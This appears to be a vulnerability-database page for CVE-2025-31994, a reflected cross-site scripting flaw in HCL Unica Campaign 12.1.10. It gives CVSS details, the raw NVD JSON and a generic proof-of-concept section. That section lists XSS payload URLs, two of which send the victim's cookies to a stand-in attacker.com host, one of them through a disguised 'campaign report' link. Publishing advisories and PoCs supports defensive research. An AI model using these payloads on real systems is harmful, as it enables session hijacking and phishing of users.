Security Vulnerability Report
CVE-2025-31994 CVSS 4.3 MEDIUM

CVE-2025-31994

Published: 2025-10-13 04:15:56
Last Modified: 2026-04-15 00:35:42

Description

HCL Unica Campaign 12.1.10 is vulnerable to Reflected Cross-Site Scripting (XSS) where an attacker injects malicious script into an HTTP request, which is then reflected unsafely in the server's immediate response to the victim's browser, executing the script as if it originated from the trusted website.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data available. Affected product as named in the description:

HCL Unica Campaign 12.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-31994 PoC: Reflected XSS in HCL Unica Campaign 12.1.10 -->
<!-- Attack vector: Inject malicious script via HTTP request parameter, reflected in server response -->

<!-- Example 1: Basic script injection via URL parameter -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<script>alert(document.cookie)</script>

<!-- Example 2: Using img tag with onerror event handler -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<img src=x onerror=alert(document.domain)>

<!-- Example 3: Using svg tag with onload event -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<svg/onload=alert('XSS')>

<!-- Example 4: Cookie exfiltration payload -->
https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Example 5: Full HTML exploitation context -->
<html>
<body>
<a href="https://target-unica-host/UnicaCampaign/vulnerableEndpoint?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>">
Click here to view campaign report
</a>
</body>
</html>

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124472 (vendor advisory, as listed in the record's JSON data below)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-31994",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T04:15:55.927",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL Unica Campaign 12.1.10 is vulnerable to Reflected Cross-Site Scripting (XSS) where an attacker injects malicious script into an HTTP request, which is then reflected unsafely in the server's immediate response to the victim's browser, executing the script as if it originated from the trusted website."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124472",
        "source": "[email protected]"
      }
    ]
  }
}